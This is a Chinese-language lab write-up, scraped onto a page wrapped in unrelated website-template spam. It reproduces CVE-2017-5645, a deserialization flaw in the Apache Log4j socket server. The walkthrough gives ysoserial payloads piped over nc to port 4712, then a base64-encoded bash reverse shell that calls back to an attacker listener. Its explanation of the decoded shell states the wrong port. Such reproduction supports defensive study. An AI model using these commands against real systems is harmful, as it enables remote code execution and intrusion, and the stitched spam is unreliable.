当前位置: 首页 > news >正文

企业网站模板下载哪家好广告网站策划方案

企业网站模板下载哪家好,广告网站策划方案,wordpress 极简杂志,网站制作 深圳文章目录 Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)1.1 漏洞描述1.2 漏洞复现1.2.1 环境启动1.2.2 漏洞验证1.2.3 漏洞利用 1.3 加固建议 Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) 1.1 漏洞描述…

文章目录

  • Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
    • 1.1 漏洞描述
    • 1.2 漏洞复现
      • 1.2.1 环境启动
      • 1.2.2 漏洞验证
      • 1.2.3 漏洞利用
    • 1.3 加固建议

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

1.1 漏洞描述

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

说明内容
漏洞编号CVE-2017-5645
漏洞名称Apache Log4j Server 反序列化命令执行漏洞
漏洞评级高危
影响范围Apache Log4j 2.8.2之前的2.x版本
漏洞描述Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.2 漏洞复现

1.2.1 环境启动

image-20231011212552558

1.2.2 漏洞验证

使用nmap工具扫描开放的端口

image-20231011212827813

可以看到4712端口是正常开启的。

使用ysoserial生成payload,然后直接发送给192.168.188.185:4712端口即可。

ysoserial是什么?

ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全地反序列化该数据时,将自动调用该链并导致在应用程序主机上执行该命令。

ysoserial项目地址:

https://github.com/frohoff/ysoserial

下载后打包成jar文件进行使用。

执行命令

java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/testsuccess" | nc 192.168.188.185 4712

image-20231014142922046

执行命令进入容器

sudo docker exec -it [容器id] /bin/bash

image-20231014143048024

执行命令

cd tmp

进入tmp文件夹,查看目录文件,可以看到testsuccess文件,可见touch /tmp/testsuccess执行成功。

image-20231014143127978

1.2.3 漏洞利用

只需要将命令替换成反弹shell的命令,就能够成功弹回shell。

bash -i >& /dev/tcp/192.168.188.185/6666 0>&1

将构造的payload进行base64加密。

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xODUvNjY2NiAwPiYx

image-20231014143732992

kali开启监听

nc -lnvp 6666

image-20231014143853966

再开启一个新的终端,输入如下内容。

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xODUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.188.185 4712

命令解析:

  • bash -c:这个选项告诉 Bash 执行后面的一系列命令。
  • {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xODUvNjY2NiAwPiYx}:这是一个经过 Base64 编码的命令字符串,解码后为bash -i >& /dev/tcp/192.168.188.185/4712 0>&1。意思是将 Bash 的输入和输出重定向到指定的 IP 地址和端口。
  • {base64,-d}:这个命令使用 base64 工具进行 Base64 解码。
  • {bash,-i}:这个命令会执行解码后的 Bash 命令,即与指定的 IP 地址和端口建立一个交互式的 Shell 连接。

image-20231014144159746

反弹成功

image-20231014144147427

能够正确执行命令,shell反弹成功

image-20231014144706974

1.3 加固建议

更新到最新版本

http://www.khdw.cn/news/25833.html

相关文章:

  • 企业不开了网站备案吗seo的课谁讲的好
  • 卓越 网站建设 深圳西乡东莞网站建设优化
  • 中国建设银行网站缴费系统做互联网项目怎么推广
  • 网站的pdf目录怎么做的网页设计工资一般多少
  • 手机网站开发技术网络推广营销技巧
  • 深圳开发网站建设网络平台推广具体是怎么推广
  • 网站信息化建设方案天津优化公司
  • WordPress固定链接跳转seo是啥
  • 专业网站建设开发甲马营seo网站优化的
  • 网站制作费会计分录怎么做营销型网站建设流程
  • 天津营销网站建设联系方式网络营销成功案例介绍
  • 做网站的图片房产成人用品网店进货渠道
  • 做网站 模板网站开发外包
  • 全国装饰公司最新排行榜长沙谷歌seo
  • 网站怎么让百度收录百度推广业务员电话
  • wordpress如何把菜单北京官网seo收费
  • WordPress滚轴动画主题搜狗搜索引擎优化论文
  • 帝国做网站的步骤seo是什么职位缩写
  • 怎样做网络推广产品seo运营学校
  • 网站开发有哪些方向seo的作用是什么
  • 怎样做自己的公司网站cps游戏推广平台
  • 广州网站建设海珠信科网站推广优化外包公司哪家好
  • 郴州红网兰州模板网站seo价格
  • 好网站有没有查询友情链接
  • 佛山网站外包百度上首页
  • 多个网站域名 是新增接入国内最新消息新闻
  • 金华网站建设方案策划自助建站网
  • 动画设计模板免费关键词排名优化
  • 5000多一年的网站建站宁波网站建设方案推广
  • 动态网站后台开发市场营销公司排名